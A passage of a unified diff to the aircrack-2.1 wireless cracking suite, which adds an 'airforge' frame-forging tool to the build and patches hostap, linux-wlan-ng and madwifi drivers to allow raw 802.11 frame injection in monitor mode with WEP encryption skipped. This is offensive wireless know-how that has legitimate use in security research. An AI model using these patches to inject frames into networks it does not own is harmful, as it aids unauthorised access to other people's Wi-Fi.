2023 | + { 0x92,0xE5,0x1D,0x03 }, { 0xD3,0xE3,0x6C,0xD8 }, { 0x51,0xEF,0x8E,0x6E }, { 0x10,0xE9,0xFF,0xB5 }, | |
2024 | + { 0xC3,0x87,0x7C,0x6F }, { 0x82,0x81,0x0D,0xB4 }, { 0x00,0x8D,0xEF,0x02 }, { 0x41,0x8B,0x9E,0xD9 }, | |
2025 | + { 0x45,0x92,0x5A,0xB4 }, { 0x04,0x94,0x2B,0x6F }, { 0x86,0x98,0xC9,0xD9 }, { 0xC7,0x9E,0xB8,0x02 }, | |
2026 | + { 0x8E,0xAA,0x41,0x02 }, { 0xCF,0xAC,0x30,0xD9 }, { 0x4D,0xA0,0xD2,0x6F }, { 0x0C,0xA6,0xA3,0xB4 }, | |
2027 | + { 0x08,0xBF,0x67,0xD9 }, { 0x49,0xB9,0x16,0x02 }, { 0xCB,0xB5,0xF4,0xB4 }, { 0x8A,0xB3,0x85,0x6F }, | |
2028 | + { 0x2C,0x6E,0x83,0xDA }, { 0x6D,0x68,0xF2,0x01 }, { 0xEF,0x64,0x10,0xB7 }, { 0xAE,0x62,0x61,0x6C }, | |
2029 | + { 0xAA,0x7B,0xA5,0x01 }, { 0xEB,0x7D,0xD4,0xDA }, { 0x69,0x71,0x36,0x6C }, { 0x28,0x77,0x47,0xB7 }, | |
2030 | + { 0x61,0x43,0xBE,0xB7 }, { 0x20,0x45,0xCF,0x6C }, { 0xA2,0x49,0x2D,0xDA }, { 0xE3,0x4F,0x5C,0x01 }, | |
2031 | + { 0xE7,0x56,0x98,0x6C }, { 0xA6,0x50,0xE9,0xB7 }, { 0x24,0x5C,0x0B,0x01 }, { 0x65,0x5A,0x7A,0xDA }, | |
2032 | + { 0xB6,0x34,0xF9,0x00 }, { 0xF7,0x32,0x88,0xDB }, { 0x75,0x3E,0x6A,0x6D }, { 0x34,0x38,0x1B,0xB6 }, | |
2033 | + { 0x30,0x21,0xDF,0xDB }, { 0x71,0x27,0xAE,0x00 }, { 0xF3,0x2B,0x4C,0xB6 }, { 0xB2,0x2D,0x3D,0x6D }, | |
2034 | + { 0xFB,0x19,0xC4,0x6D }, { 0xBA,0x1F,0xB5,0xB6 }, { 0x38,0x13,0x57,0x00 }, { 0x79,0x15,0x26,0xDB }, | |
2035 | + { 0x7D,0x0C,0xE2,0xB6 }, { 0x3C,0x0A,0x93,0x6D }, { 0xBE,0x06,0x71,0xDB }, { 0xFF,0x00,0x00,0x00 } | |
2036 | +}; | |
2037 | + | |
2038 | +#endif /* crctable.h */ | |
2039 | diff -urN aircrack-2.1.orig/Makefile aircrack-2.1/Makefile | |
2040 | --- aircrack-2.1.orig/Makefile 2004-10-01 21:30:00.000000000 +0200 | |
2041 | +++ aircrack-2.1/Makefile 2005-04-22 08:53:15.398815552 +0200 | |
2042 | @@ -7,13 +7,14 @@ | |
2043 | docdir = $(datadir)/aircrack | |
2044 | ||
2045 | DESTDIR = | |
2046 | -BINFILES = 802ether aircrack aireplay airodump hopper.sh | |
2047 | +BINFILES = 802ether aircrack aireplay airodump airforge hopper.sh | |
2048 | DOCFILES = ChangeLog rawsend.patch docs/aircrack.html | |
2049 | ||
2050 | all: | |
2051 | $(CC) $(CFLAGS) $(OPTFLAGS) 802ether.c -o 802ether | |
2052 | $(CC) $(CFLAGS) $(OPTFLAGS) aircrack.c -o aircrack | |
2053 | $(CC) $(CFLAGS) $(OPTFLAGS) aireplay.c -o aireplay | |
2054 | + $(CC) $(CFLAGS) $(OPTFLAGS) airforge.c -o airforge | |
2055 | $(CC) $(CFLAGS) $(OPTFLAGS) airodump.c -o airodump | |
2056 | ||
2057 | install: | |
2058 | @@ -25,4 +26,4 @@ | |
2059 | install -m 644 $(DOCFILES) $(DESTDIR)$(docdir) | |
2060 | ||
2061 | clean: | |
2062 | - rm -f *.o 802ether aircrack aireplay airodump | |
2063 | + rm -f *.o 802ether aircrack aireplay airforge airodump | |
2064 | diff -urN aircrack-2.1.orig/patch/hostap-driver-0.3.7.patch.0.1 aircrack-2.1/patch/hostap-driver-0.3.7.patch.0.1 | |
2065 | --- aircrack-2.1.orig/patch/hostap-driver-0.3.7.patch.0.1 1970-01-01 01:00:00.000000000 +0100 | |
2066 | +++ aircrack-2.1/patch/hostap-driver-0.3.7.patch.0.1 2005-04-22 08:51:21.935064664 +0200 | |
2067 | @@ -0,0 +1,12 @@ | |
2068 | +diff -aur hostap-driver-0.3.7-orig/driver/modules/hostap_80211_tx.c hostap-driver-0.3.7/driver/modules/hostap_80211_tx.c | |
2069 | +--- hostap-driver-0.3.7-orig/driver/modules/hostap_80211_tx.c 2004-07-06 01:45:01.000000000 +0200 | |
2070 | ++++ hostap-driver-0.3.7/driver/modules/hostap_80211_tx.c 2005-03-14 13:53:20.000000000 +0100 | |
2071 | +@@ -466,7 +466,7 @@ | |
2072 | + goto fail; | |
2073 | + } | |
2074 | + | |
2075 | +- if (tx.crypt) { | |
2076 | ++ if (tx.crypt && memcmp(tx.crypt->priv+4,"\x01\x02\x04\x08\x10",5)) { | |
2077 | + skb = hostap_tx_encrypt(skb, tx.crypt); | |
2078 | + if (skb == NULL) { | |
2079 | + printk(KERN_DEBUG "%s: TX - encryption failed\n", | |
2080 | diff -urN aircrack-2.1.orig/patch/linux-wlan-ng-0.2.1-pre26.patch.0.1 aircrack-2.1/patch/linux-wlan-ng-0.2.1-pre26.patch.0.1 | |
2081 | --- aircrack-2.1.orig/patch/linux-wlan-ng-0.2.1-pre26.patch.0.1 1970-01-01 01:00:00.000000000 +0100 | |
2082 | +++ aircrack-2.1/patch/linux-wlan-ng-0.2.1-pre26.patch.0.1 2005-04-22 08:51:21.936064512 +0200 | |
2083 | @@ -0,0 +1,284 @@ | |
2084 | +diff -aur linux-wlan-ng-0.2.1-pre26-orig/src/p80211/p80211netdev.c linux-wlan-ng-0.2.1-pre26/src/p80211/p80211netdev.c | |
2085 | +--- linux-wlan-ng-0.2.1-pre26-orig/src/p80211/p80211netdev.c 2005-01-11 18:43:54.000000000 +0100 | |
2086 | ++++ linux-wlan-ng-0.2.1-pre26/src/p80211/p80211netdev.c 2005-03-14 13:58:11.000000000 +0100 | |
2087 | +@@ -525,7 +525,7 @@ | |
2088 | + * and return success . | |
2089 | + * TODO: we need a saner way to handle this | |
2090 | + */ | |
2091 | +- if(skb->protocol != ETH_P_80211_RAW) { | |
2092 | ++ if(skb->protocol != htons(ETH_P_80211_RAW)) { | |
2093 | + p80211netdev_start_queue(wlandev); | |
2094 | + WLAN_LOG_NOTICE( | |
2095 | + "Tx attempt prior to association, frame dropped.\n"); | |
2096 | +@@ -537,7 +537,7 @@ | |
2097 | + } | |
2098 | + | |
2099 | + /* Check for raw transmits */ | |
2100 | +- if(skb->protocol == ETH_P_80211_RAW) { | |
2101 | ++ if(skb->protocol == htons(ETH_P_80211_RAW)) { | |
2102 | + if (!capable(CAP_NET_ADMIN)) { | |
2103 | + return(-EPERM); | |
2104 | + } | |
2105 | +@@ -965,8 +965,9 @@ | |
2106 | + dev->set_mac_address = p80211knetdev_set_mac_address; | |
2107 | + #endif | |
2108 | + #ifdef HAVE_TX_TIMEOUT | |
2109 | +- dev->tx_timeout = &p80211knetdev_tx_timeout; | |
2110 | +- dev->watchdog_timeo = (wlan_watchdog * HZ) / 1000; | |
2111 | ++// KoreK: still not implemented | |
2112 | ++// dev->tx_timeout = &p80211knetdev_tx_timeout; | |
2113 | ++// dev->watchdog_timeo = (wlan_watchdog * HZ) / 1000; | |
2114 | + #endif | |
2115 | + | |
2116 | + } | |
2117 | +diff -aur linux-wlan-ng-0.2.1-pre26-orig/src/prism2/driver/Makefile linux-wlan-ng-0.2.1-pre26/src/prism2/driver/Makefile | |
2118 | +--- linux-wlan-ng-0.2.1-pre26-orig/src/prism2/driver/Makefile 2005-01-25 02:41:44.000000000 +0100 | |
2119 | ++++ linux-wlan-ng-0.2.1-pre26/src/prism2/driver/Makefile 2005-03-14 13:58:11.000000000 +0100 | |
2120 | +@@ -88,7 +88,7 @@ | |
2121 | + MODVERDIR=$(WLAN_SRC)/.tmp_versions modules | |
2122 | + else # kbuild 2.4 | |
2123 | + | |
2124 | +- $(MAKE) -C $(LINUX_SRC) SUBDIRS=$(PWD) WLAN_SRC=$(PWD) \ | |
2125 | ++ $(MAKE) -C $(LINUX_SRC) SUBDIRS=$(PWD) WLAN_SRC=$(WLAN_SRC) \ | |
2126 | + modules | |
2127 | + | |
2128 | + endif # kbuild switch | |
2129 | +diff -aur linux-wlan-ng-0.2.1-pre26-orig/src/prism2/driver/hfa384x.c linux-wlan-ng-0.2.1-pre26/src/prism2/driver/hfa384x.c | |
2130 | +--- linux-wlan-ng-0.2.1-pre26-orig/src/prism2/driver/hfa384x.c 2005-01-25 01:38:50.000000000 +0100 | |
2131 | ++++ linux-wlan-ng-0.2.1-pre26/src/prism2/driver/hfa384x.c 2005-03-14 15:21:02.000000000 +0100 | |
2132 | +@@ -1941,8 +1941,14 @@ | |
2133 | + | |
2134 | + DBFENTER; | |
2135 | + | |
2136 | +- cmd.cmd = HFA384x_CMD_CMDCODE_SET(HFA384x_CMDCODE_MONITOR) | | |
2137 | +- HFA384x_CMD_AINFO_SET(enable); | |
2138 | ++ if (enable == HFA384x_MONITOR_ENABLE) { | |
2139 | ++ // KoreK: get into test mode 0x0a | |
2140 | ++ cmd.cmd = HFA384x_CMD_CMDCODE_SET(HFA384x_CMDCODE_MONITOR) | | |
2141 | ++ HFA384x_CMD_AINFO_SET(0x0a); | |
2142 | ++ } else { | |
2143 | ++ cmd.cmd = HFA384x_CMD_CMDCODE_SET(HFA384x_CMDCODE_MONITOR) | | |
2144 | ++ HFA384x_CMD_AINFO_SET(enable); | |
2145 | ++ } | |
2146 | + cmd.parm0 = 0; | |
2147 | + cmd.parm1 = 0; | |
2148 | + cmd.parm2 = 0; | |
2149 | +@@ -3178,13 +3184,26 @@ | |
2150 | + HFA384x_TX_TXEX_SET(0) | HFA384x_TX_TXOK_SET(0); | |
2151 | + #endif | |
2152 | + | |
2153 | +- /* if we're using host WEP, increase size by IV+ICV */ | |
2154 | +- if (p80211_wep->data) { | |
2155 | +- txdesc.data_len = host2hfa384x_16(skb->len+8); | |
2156 | +- // txdesc.tx_control |= HFA384x_TX_NOENCRYPT_SET(1); | |
2157 | +- } else { | |
2158 | +- txdesc.data_len = host2hfa384x_16(skb->len); | |
2159 | +- } | |
2160 | ++ if (skb->protocol != htons(ETH_P_80211_RAW)) { | |
2161 | ++ /* if we're using host WEP, increase size by IV+ICV */ | |
2162 | ++ if (p80211_wep->data) { | |
2163 | ++ txdesc.data_len = host2hfa384x_16(skb->len+8); | |
2164 | ++ // txdesc.tx_control |= HFA384x_TX_NOENCRYPT_SET(1); | |
2165 | ++ } else { | |
2166 | ++ txdesc.data_len = host2hfa384x_16(skb->len); | |
2167 | ++ } | |
2168 | ++ } else { | |
2169 | ++ /* KoreK: raw injection (monitor mode): pull the rest of | |
2170 | ++ the header and ssanity check on txdesc.data_len */ | |
2171 | ++ memcpy(&(txdesc.data_len), skb->data, 16); | |
2172 | ++ skb_pull(skb,16); | |
2173 | ++ if (txdesc.data_len != host2hfa384x_16(skb->len)) { | |
2174 | ++ printk(KERN_DEBUG "mismatch frame_len, drop frame\n"); | |
2175 | ++ return 0; | |
2176 | ++ } | |
2177 | ++ | |
2178 | ++ txdesc.tx_control |= HFA384x_TX_RETRYSTRAT_SET(1); | |
2179 | ++ } | |
2180 | + | |
2181 | + txdesc.tx_control = host2hfa384x_16(txdesc.tx_control); | |
2182 | + /* copy the header over to the txdesc */ | |
2183 | +@@ -3207,7 +3226,7 @@ | |
2184 | + spin_lock(&hw->cmdlock); | |
2185 | + | |
2186 | + /* Copy descriptor+payload to FID */ | |
2187 | +- if (p80211_wep->data) { | |
2188 | ++ if (p80211_wep->data && (skb->protocol != htons(ETH_P_80211_RAW))) { | |
2189 | + result = hfa384x_copy_to_bap4(hw, HFA384x_BAP_PROC, fid, 0, | |
2190 | + &txdesc, sizeof(txdesc), | |
2191 | + p80211_wep->iv, sizeof(p80211_wep->iv), | |
2192 | +@@ -3657,6 +3676,16 @@ | |
2193 | + switch( HFA384x_RXSTATUS_MACPORT_GET(rxdesc.status) ) | |
2194 | + { | |
2195 | + case 0: | |
2196 | ++ /* KoreK: this testmode uses macport 0 */ | |
2197 | ++ if ((wlandev->netdev->type == ARPHRD_IEEE80211) || | |
2198 | ++ (wlandev->netdev->type == ARPHRD_IEEE80211_PRISM)) { | |
2199 | ++ if ( ! HFA384x_RXSTATUS_ISFCSERR(rxdesc.status) ) { | |
2200 | ++ hfa384x_int_rxmonitor( wlandev, rxfid, &rxdesc); | |
2201 | ++ } else { | |
2202 | ++ WLAN_LOG_DEBUG(3,"Received monitor frame: FCSerr set\n"); | |
2203 | ++ } | |
2204 | ++ goto done; | |
2205 | ++ } | |
2206 | + | |
2207 | + fc = ieee2host16(rxdesc.frame_control); | |
2208 | + | |
2209 | +diff -aur linux-wlan-ng-0.2.1-pre26-orig/src/prism2/driver/hfa384x_usb.c linux-wlan-ng-0.2.1-pre26/src/prism2/driver/hfa384x_usb.c | |
2210 | +--- linux-wlan-ng-0.2.1-pre26-orig/src/prism2/driver/hfa384x_usb.c 2005-01-17 17:24:40.000000000 +0100 | |
2211 | ++++ linux-wlan-ng-0.2.1-pre26/src/prism2/driver/hfa384x_usb.c 2005-03-14 15:27:57.000000000 +0100 | |
2212 | +@@ -1143,8 +1143,14 @@ | |
2213 | + | |
2214 | + DBFENTER; | |
2215 | + | |
2216 | +- cmd.cmd = HFA384x_CMD_CMDCODE_SET(HFA384x_CMDCODE_MONITOR) | | |
2217 | +- HFA384x_CMD_AINFO_SET(enable); | |
2218 | ++ if (enable == HFA384x_MONITOR_ENABLE) { | |
2219 | ++ // KoreK: get into test mode 0x0a | |
2220 | ++ cmd.cmd = HFA384x_CMD_CMDCODE_SET(HFA384x_CMDCODE_MONITOR) | | |
2221 | ++ HFA384x_CMD_AINFO_SET(0x0a); | |
2222 | ++ } else { | |
2223 | ++ cmd.cmd = HFA384x_CMD_CMDCODE_SET(HFA384x_CMDCODE_MONITOR) | | |
2224 | ++ HFA384x_CMD_AINFO_SET(enable); | |
2225 | ++ } | |
2226 | + cmd.parm0 = 0; | |
2227 | + cmd.parm1 = 0; | |
2228 | + cmd.parm2 = 0; | |
2229 | +@@ -3258,37 +3264,59 @@ | |
2230 | + HFA384x_TX_MACPORT_SET(0) | HFA384x_TX_STRUCTYPE_SET(1) | | |
2231 | + HFA384x_TX_TXEX_SET(0) | HFA384x_TX_TXOK_SET(0); | |
2232 | + #endif | |
2233 | +- hw->txbuff.txfrm.desc.tx_control = | |
2234 | +- host2hfa384x_16(hw->txbuff.txfrm.desc.tx_control); | |
2235 | + | |
2236 | +- /* copy the header over to the txdesc */ | |
2237 | +- memcpy(&(hw->txbuff.txfrm.desc.frame_control), p80211_hdr, sizeof(p80211_hdr_t)); | |
2238 | ++ if (skb->protocol != htons(ETH_P_80211_RAW)) { | |
2239 | ++ hw->txbuff.txfrm.desc.tx_control = | |
2240 | ++ host2hfa384x_16(hw->txbuff.txfrm.desc.tx_control); | |
2241 | ++ | |
2242 | ++ /* copy the header over to the txdesc */ | |
2243 | ++ memcpy(&(hw->txbuff.txfrm.desc.frame_control), p80211_hdr, | |
2244 | ++ sizeof(p80211_hdr_t)); | |
2245 | ++ | |
2246 | ++ /* if we're using host WEP, increase size by IV+ICV */ | |
2247 | ++ if (p80211_wep->data) { | |
2248 | ++ hw->txbuff.txfrm.desc.data_len = host2hfa384x_16(skb->len+8); | |
2249 | ++ // hw->txbuff.txfrm.desc.tx_control |= HFA384x_TX_NOENCRYPT_SET(1); | |
2250 | ++ usbpktlen+=8; | |
2251 | ++ } else { | |
2252 | ++ hw->txbuff.txfrm.desc.data_len = host2hfa384x_16(skb->len); | |
2253 | ++ } | |
2254 | ++ } else { | |
2255 | ++ /* KoreK: raw injection (monitor mode): pull the rest of | |
2256 | ++ the header and ssanity check on txdesc.data_len */ | |
2257 | ++ memcpy(&(hw->txbuff.txfrm.desc.data_len), skb->data, 16); | |
2258 | ++ skb_pull(skb,16); | |
2259 | ++ if (hw->txbuff.txfrm.desc.data_len != host2hfa384x_16(skb->len)) { | |
2260 | ++ printk(KERN_DEBUG "mismatch frame_len, drop frame\n"); | |
2261 | ++ return 0; | |
2262 | ++ } | |
2263 | + | |
2264 | +- /* if we're using host WEP, increase size by IV+ICV */ | |
2265 | +- if (p80211_wep->data) { | |
2266 | +- hw->txbuff.txfrm.desc.data_len = host2hfa384x_16(skb->len+8); | |
2267 | +- // hw->txbuff.txfrm.desc.tx_control |= HFA384x_TX_NOENCRYPT_SET(1); | |
2268 | +- usbpktlen+=8; | |
2269 | +- } else { | |
2270 | +- hw->txbuff.txfrm.desc.data_len = host2hfa384x_16(skb->len); | |
2271 | ++ hw->txbuff.txfrm.desc.tx_control |= HFA384x_TX_RETRYSTRAT_SET(1); | |
2272 | ++ hw->txbuff.txfrm.desc.tx_control = | |
2273 | ++ host2hfa384x_16(hw->txbuff.txfrm.desc.tx_control); | |
2274 | ++ | |
2275 | ++ /* copy the header over to the txdesc */ | |
2276 | ++ memcpy(&(hw->txbuff.txfrm.desc.frame_control), p80211_hdr, | |
2277 | ++ sizeof(p80211_hdr_t)); | |
2278 | + } | |
2279 | + | |
2280 | + usbpktlen += skb->len; | |
2281 | + | |
2282 | + /* copy over the WEP IV if we are using host WEP */ | |
2283 | + ptr = hw->txbuff.txfrm.data; | |
2284 | +- if (p80211_wep->data) { | |
2285 | ++ if (p80211_wep->data && skb->protocol != htons(ETH_P_80211_RAW)) { | |
2286 | + memcpy(ptr, p80211_wep->iv, sizeof(p80211_wep->iv)); | |
2287 | + ptr+= sizeof(p80211_wep->iv); | |
2288 | + memcpy(ptr, p80211_wep->data, skb->len); | |
2289 | + } else { | |
2290 | + memcpy(ptr, skb->data, skb->len); | |
2291 | + } | |
2292 | ++ | |
2293 | + /* copy over the packet data */ | |
2294 | + ptr+= skb->len; | |
2295 | + | |
2296 | + /* copy over the WEP ICV if we are using host WEP */ | |
2297 | +- if (p80211_wep->data) { | |
2298 | ++ if (p80211_wep->data && skb->protocol != htons(ETH_P_80211_RAW)) { | |
2299 | + memcpy(ptr, p80211_wep->icv, sizeof(p80211_wep->icv)); | |
2300 | + } | |
2301 | + | |
2302 | +@@ -4105,6 +4133,17 @@ | |
2303 | + switch( HFA384x_RXSTATUS_MACPORT_GET(usbin->rxfrm.desc.status)) | |
2304 | + { | |
2305 | + case 0: | |
2306 | ++ /* KoreK: this testmode uses macport 0 */ | |
2307 | ++ if ((wlandev->netdev->type == ARPHRD_IEEE80211) || | |
2308 | ++ (wlandev->netdev->type == ARPHRD_IEEE80211_PRISM)) { | |
2309 | ++ if ( ! HFA384x_RXSTATUS_ISFCSERR(usbin->rxfrm.desc.status) ) { | |
2310 | ++ hfa384x_int_rxmonitor(wlandev, &usbin->rxfrm); | |
2311 | ++ } else { | |
2312 | ++ WLAN_LOG_DEBUG(3,"Received monitor frame: FCSerr set\n"); | |
2313 | ++ } | |
2314 | ++ goto done; | |
2315 | ++ } | |
2316 | ++ | |
2317 | + w_hdr = (p80211_hdr_t *) &(usbin->rxfrm.desc.frame_control); | |
2318 | + fc = ieee2host16(usbin->rxfrm.desc.frame_control); | |
2319 | + | |
2320 | +diff -aur linux-wlan-ng-0.2.1-pre26-orig/src/prism2/driver/prism2mgmt.c linux-wlan-ng-0.2.1-pre26/src/prism2/driver/prism2mgmt.c | |
2321 | +--- linux-wlan-ng-0.2.1-pre26-orig/src/prism2/driver/prism2mgmt.c 2005-01-25 01:38:50.000000000 +0100 | |
2322 | ++++ linux-wlan-ng-0.2.1-pre26/src/prism2/driver/prism2mgmt.c 2005-03-14 13:58:11.000000000 +0100 | |
2323 | +@@ -2855,9 +2855,10 @@ | |
2324 | + } | |
2325 | + | |
2326 | + /* Now if we're already sniffing, we can skip the rest */ | |
2327 | +- if (wlandev->netdev->type != ARPHRD_ETHER) { | |
2328 | ++ if ((wlandev->netdev->type != ARPHRD_IEEE80211) && | |
2329 | ++ (wlandev->netdev->type != ARPHRD_IEEE80211_PRISM)) { | |
2330 | + /* Set the port type to pIbss */ | |
2331 | +- word = HFA384x_PORTTYPE_PSUEDOIBSS; | |
2332 | ++ word = 5; // HFA384x_PORTTYPE_PSUEDOIBSS; | |
2333 | + result = hfa384x_drvr_setconfig16(hw, | |
2334 | + HFA384x_RID_CNFPORTTYPE, word); | |
2335 | + if ( result ) { | |
2336 | +@@ -2869,6 +2870,8 @@ | |
2337 | + } | |
2338 | + if ((msg->keepwepflags.status == P80211ENUM_msgitem_status_data_ok) && (msg->keepwepflags.data != P80211ENUM_truth_true)) { | |
2339 | + /* Set the wepflags for no decryption */ | |
2340 | ++ /* doesn't work - done from the CLI */ | |
2341 | ++ /* Fix? KoreK */ | |
2342 | + word = HFA384x_WEPFLAGS_DISABLE_TXCRYPT | | |
2343 | + HFA384x_WEPFLAGS_DISABLE_RXCRYPT; | |
2344 | + result = hfa384x_drvr_setconfig16(hw, HFA384x_RID_CNFWEPFLAGS, word); | |
2345 | +@@ -2914,7 +2917,8 @@ | |
2346 | + goto failed; | |
2347 | + } | |
2348 | + | |
2349 | +- if (wlandev->netdev->type == ARPHRD_ETHER) { | |
2350 | ++ if ((wlandev->netdev->type != ARPHRD_IEEE80211) && | |
2351 | ++ (wlandev->netdev->type != ARPHRD_IEEE80211_PRISM)) { | |
2352 | + WLAN_LOG_INFO("monitor mode enabled\n"); | |
2353 | + } | |
2354 | + | |
2355 | +diff -aur linux-wlan-ng-0.2.1-pre26-orig/src/prism2/driver/prism2sta.c linux-wlan-ng-0.2.1-pre26/src/prism2/driver/prism2sta.c | |
2356 | +--- linux-wlan-ng-0.2.1-pre26-orig/src/prism2/driver/prism2sta.c 2005-01-25 01:38:50.000000000 +0100 | |
2357 | ++++ linux-wlan-ng-0.2.1-pre26/src/prism2/driver/prism2sta.c 2005-03-14 13:58:11.000000000 +0100 | |
2358 | +@@ -649,7 +649,8 @@ | |
2359 | + DBFENTER; | |
2360 | + | |
2361 | + /* If necessary, set the 802.11 WEP bit */ | |
2362 | +- if ((wlandev->hostwep & (HOSTWEP_PRIVACYINVOKED | HOSTWEP_ENCRYPT)) == HOSTWEP_PRIVACYINVOKED) { | |
2363 | ++ if (((wlandev->hostwep & (HOSTWEP_PRIVACYINVOKED | HOSTWEP_ENCRYPT)) == HOSTWEP_PRIVACYINVOKED) | |
2364 | ++ && (skb->protocol != htons(ETH_P_80211_RAW))) { | |
2365 | + p80211_hdr->a3.fc |= host2ieee16(WLAN_SET_FC_ISWEP(1)); | |
2366 | + } | |
2367 | + | |
2368 | diff -urN aircrack-2.1.orig/patch/madwifi-20050309.patch.0.1 aircrack-2.1/patch/madwifi-20050309.patch.0.1 | |
2369 | --- aircrack-2.1.orig/patch/madwifi-20050309.patch.0.1 1970-01-01 01:00:00.000000000 +0100 | |
2370 | +++ aircrack-2.1/patch/madwifi-20050309.patch.0.1 2005-04-22 08:51:21.936064512 +0200 | |
2371 | @@ -0,0 +1,123 @@ | |
2372 | +diff -ur madwifi/ath/if_ath.c madwifi-foo/ath/if_ath.c | |
2373 | +--- madwifi/ath/if_ath.c 2005-03-09 14:48:52.000000000 -0500 | |
2374 | ++++ madwifi-foo/ath/if_ath.c 2005-03-09 22:02:12.000000000 -0500 | |
2375 | +@@ -1113,7 +1113,8 @@ | |
2376 | + /* | |
2377 | + * Encapsulate the packet for transmission. | |
2378 | + */ | |
2379 | +- skb = ieee80211_encap(ic, skb, &ni); | |
2380 | ++ if (ic->ic_opmode != IEEE80211_M_MONITOR) | |
2381 | ++ skb = ieee80211_encap(ic, skb, &ni); | |
2382 | + if (skb == NULL) { | |
2383 | + DPRINTF(sc, ATH_DEBUG_XMIT, | |
2384 | + "%s: discard, encapsulation failure\n", __func__); | |
2385 | +@@ -2843,7 +2844,7 @@ | |
2386 | + hdrlen = ieee80211_anyhdrsize(wh); | |
2387 | + pktlen = skb->len; | |
2388 | + | |
2389 | +- if (iswep) { | |
2390 | ++ if (iswep && ic->ic_opmode != IEEE80211_M_MONITOR) { | |
2391 | + const struct ieee80211_cipher *cip; | |
2392 | + struct ieee80211_key *k; | |
2393 | + | |
2394 | +@@ -2905,7 +2906,7 @@ | |
2395 | + * use short preamble based on the current mode and | |
2396 | + * negotiated parameters. | |
2397 | + */ | |
2398 | +- if ((ic->ic_flags & IEEE80211_F_SHPREAMBLE) && | |
2399 | ++ if ((ic->ic_flags & IEEE80211_F_SHPREAMBLE) && ni != NULL && | |
2400 | + (ni->ni_capinfo & IEEE80211_CAPINFO_SHORT_PREAMBLE)) { | |
2401 | + shortPreamble = AH_TRUE; | |
2402 | + sc->sc_stats.ast_tx_shortpre++; | |
2403 | +@@ -2920,6 +2921,11 @@ | |
2404 | + */ | |
2405 | + switch (wh->i_fc[0] & IEEE80211_FC0_TYPE_MASK) { | |
2406 | + case IEEE80211_FC0_TYPE_MGT: | |
2407 | ++ if (ic->ic_opmode == IEEE80211_M_MONITOR) { | |
2408 | ++ atype = HAL_PKT_TYPE_NORMAL; /* default */ | |
2409 | ++ txq = sc->sc_ac2q[skb->priority]; | |
2410 | ++ break; | |
2411 | ++ } | |
2412 | + subtype = wh->i_fc[0] & IEEE80211_FC0_SUBTYPE_MASK; | |
2413 | + if (subtype == IEEE80211_FC0_SUBTYPE_BEACON) | |
2414 | + atype = HAL_PKT_TYPE_BEACON; | |
2415 | +@@ -2939,6 +2945,11 @@ | |
2416 | + txq = sc->sc_ac2q[WME_AC_VO]; | |
2417 | + break; | |
2418 | + case IEEE80211_FC0_TYPE_CTL: | |
2419 | ++ if (ic->ic_opmode == IEEE80211_M_MONITOR) { | |
2420 | ++ atype = HAL_PKT_TYPE_NORMAL; /* default */ | |
2421 | ++ txq = sc->sc_ac2q[skb->priority]; | |
2422 | ++ break; | |
2423 | ++ } | |
2424 | + atype = HAL_PKT_TYPE_PSPOLL; /* stop setting of duration */ | |
2425 | + rix = 0; /* XXX lowest rate */ | |
2426 | + try0 = ATH_TXMAXTRY; | |
2427 | +@@ -2951,11 +2962,14 @@ | |
2428 | + break; | |
2429 | + case IEEE80211_FC0_TYPE_DATA: | |
2430 | + atype = HAL_PKT_TYPE_NORMAL; /* default */ | |
2431 | ++ rix = 0; /* XXX lowest rate */ | |
2432 | ++ try0 = ATH_TXMAXTRY; | |
2433 | + /* | |
2434 | + * Data frames; consult the rate control module. | |
2435 | + */ | |
2436 | +- ath_rate_findrate(sc, an, shortPreamble, skb->len, | |
2437 | +- &rix, &try0, &txrate); | |
2438 | ++ if (ic->ic_opmode != IEEE80211_M_MONITOR) | |
2439 | ++ ath_rate_findrate(sc, an, shortPreamble, skb->len, | |
2440 | ++ &rix, &try0, &txrate); | |
2441 | + /* | |
2442 | + * Default all non-QoS traffic to the background queue. | |
2443 | + */ | |
2444 | +@@ -2966,6 +2980,11 @@ | |
2445 | + txq = sc->sc_ac2q[WME_AC_BK]; | |
2446 | + break; | |
2447 | + default: | |
2448 | ++ if (ic->ic_opmode == IEEE80211_M_MONITOR) { | |
2449 | ++ atype = HAL_PKT_TYPE_NORMAL; /* default */ | |
2450 | ++ txq = sc->sc_ac2q[skb->priority]; | |
2451 | ++ break; | |
2452 | ++ } | |
2453 | + printk("%s: bogus frame type 0x%x (%s)\n", dev->name, | |
2454 | + wh->i_fc[0] & IEEE80211_FC0_TYPE_MASK, __func__); | |
2455 | + /* XXX statistic */ | |
2456 | +@@ -3068,6 +3087,12 @@ | |
2457 | + ieee80211_dump_pkt(skb->data, skb->len, | |
2458 | + sc->sc_hwmap[txrate], -1); | |
2459 | + | |
2460 | ++ /* Let those crazy kids transmit frames in monitor mode */ | |
2461 | ++ if (ic->ic_opmode == IEEE80211_M_MONITOR) { | |
2462 | ++ /* Only transmit one frame, disable retrans */ | |
2463 | ++ try0 = 1; | |
2464 | ++ } | |
2465 | ++ | |
2466 | + /* | |
2467 | + * Determine if a tx interrupt should be generated for | |
2468 | + * this descriptor. We take a tx interrupt to reap | |
2469 | +@@ -3096,7 +3121,7 @@ | |
2470 | + , pktlen /* packet length */ | |
2471 | + , hdrlen /* header length */ | |
2472 | + , atype /* Atheros packet type */ | |
2473 | +- , MIN(ni->ni_txpower,60)/* txpower */ | |
2474 | ++ , 60 /* txpower */ | |
2475 | + , txrate, try0 /* series 0 rate/tries */ | |
2476 | + , keyix /* key cache index */ | |
2477 | + , sc->sc_txantenna /* antenna mode */ | |
2478 | +@@ -3104,6 +3129,7 @@ | |
2479 | + , ctsrate /* rts/cts rate */ | |
2480 | + , ctsduration /* rts/cts duration */ | |
2481 | + ); | |
2482 | ++ | |
2483 | + /* | |
2484 | + * Setup the multi-rate retry state only when we're | |
2485 | + * going to use it. This assumes ath_hal_setuptxdesc | |
2486 | +@@ -3111,7 +3137,7 @@ | |
2487 | + * when the hardware supports multi-rate retry and | |
2488 | + * we don't use it. | |
2489 | + */ | |
2490 | +- if (try0 != ATH_TXMAXTRY) | |
2491 | ++ if (try0 != ATH_TXMAXTRY && ic->ic_opmode != IEEE80211_M_MONITOR) | |
2492 | + ath_rate_setupxtxdesc(sc, an, ds, shortPreamble, rix); | |
2493 | + | |
2494 | + ds->ds_link = 0; | |
2495 | diff -urN aircrack-2.1.orig/patch/prism54-kernel-2.6.10.patch.0.1 aircrack-2.1/patch/prism54-kernel-2.6.10.patch.0.1 | |
2496 | --- aircrack-2.1.orig/patch/prism54-kernel-2.6.10.patch.0.1 1970-01-01 01:00:00.000000000 +0100 | |
